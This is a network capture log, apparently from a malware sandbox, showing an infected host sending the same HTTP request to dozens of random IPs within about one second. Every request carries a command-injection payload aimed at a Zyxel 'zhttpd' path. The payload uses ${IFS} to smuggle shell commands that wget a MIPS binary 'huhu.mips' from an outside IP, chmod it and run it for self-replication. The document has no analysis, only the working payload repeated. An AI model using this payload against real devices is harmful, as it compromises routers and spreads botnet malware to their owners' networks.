                                                      Feb 2, 2024 06:36:09.998389006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8447192.168.2.1434438106.219.133.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998444080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8448192.168.2.1453306114.224.105.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998490095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8449192.168.2.1457300205.65.21.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998524904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8450192.168.2.1451208141.40.240.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998572111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8451192.168.2.143737293.65.236.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998625994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8452192.168.2.1452344138.187.60.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998672962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8453192.168.2.1446540126.184.116.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998707056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8454192.168.2.1443048192.84.94.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998728991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8455192.168.2.144920414.86.220.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998775005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8456192.168.2.1434300130.97.61.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998830080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8457192.168.2.1458610159.108.220.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998866081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8458192.168.2.143723494.208.60.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998925924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8459192.168.2.1459964142.36.165.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998969078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8460192.168.2.1440130213.186.148.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999006987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8461192.168.2.145419863.242.185.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999046087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8462192.168.2.1457814157.58.210.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999102116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8463192.168.2.143309677.39.144.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999125957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8464192.168.2.1448904176.68.113.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999147892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8465192.168.2.1436136105.36.37.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999196053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8466192.168.2.1438106198.72.111.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999248981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8467192.168.2.144477227.117.53.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999281883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8468192.168.2.143982869.246.124.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999329090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8469192.168.2.1450732177.52.62.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999381065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8470192.168.2.144256069.107.153.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999423027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8471192.168.2.1459698161.181.209.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999475956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8472192.168.2.1441550161.211.70.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999512911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8473192.168.2.1444224173.184.120.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999551058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8474192.168.2.1458068137.251.117.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999609947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8475192.168.2.1452890217.255.228.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999633074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8476192.168.2.1453572110.203.198.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999675035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8477192.168.2.1440406188.76.118.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999711990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8478192.168.2.1450272152.219.10.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999748945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8479192.168.2.145055065.100.65.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999788046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8480192.168.2.145890423.85.190.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999840975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8481192.168.2.145236060.58.149.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999893904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8482192.168.2.1459940206.28.137.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999917030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8483192.168.2.1445746150.210.163.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.999974966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8484192.168.2.1446990192.234.150.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000019073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8485192.168.2.144351644.12.9.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000071049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8486192.168.2.1459814120.24.67.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000094891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8487192.168.2.1459762195.238.32.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000139952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8488192.168.2.14339425.57.131.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000157118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8489192.168.2.1448650114.50.121.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000195026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8490192.168.2.143765894.153.29.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000247955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8491192.168.2.1439366125.103.21.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000277996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8492192.168.2.1450792168.216.230.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000298977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8493192.168.2.143799232.97.140.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000355959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8494192.168.2.1442436106.44.89.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000406027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8495192.168.2.143386041.106.153.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000442982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8496192.168.2.1456052153.147.165.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000482082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8497192.168.2.1451076205.188.223.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000521898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8498192.168.2.14504069.35.164.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000570059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8499192.168.2.1451690146.147.147.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000597000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8500192.168.2.1457554200.127.160.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000658989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8501192.168.2.144400281.121.165.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000715017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8502192.168.2.143710012.79.246.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000752926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8503192.168.2.1439260211.48.206.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000802040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8504192.168.2.1436190181.141.168.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000832081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8505192.168.2.1452926119.84.50.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000879049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8506192.168.2.1444962201.84.148.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000924110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8507192.168.2.1448784108.225.67.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000979900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8508192.168.2.1447356157.96.113.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.000994921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8509192.168.2.143857858.133.213.189443
                                                      TimestampBytes transferredDirectionData
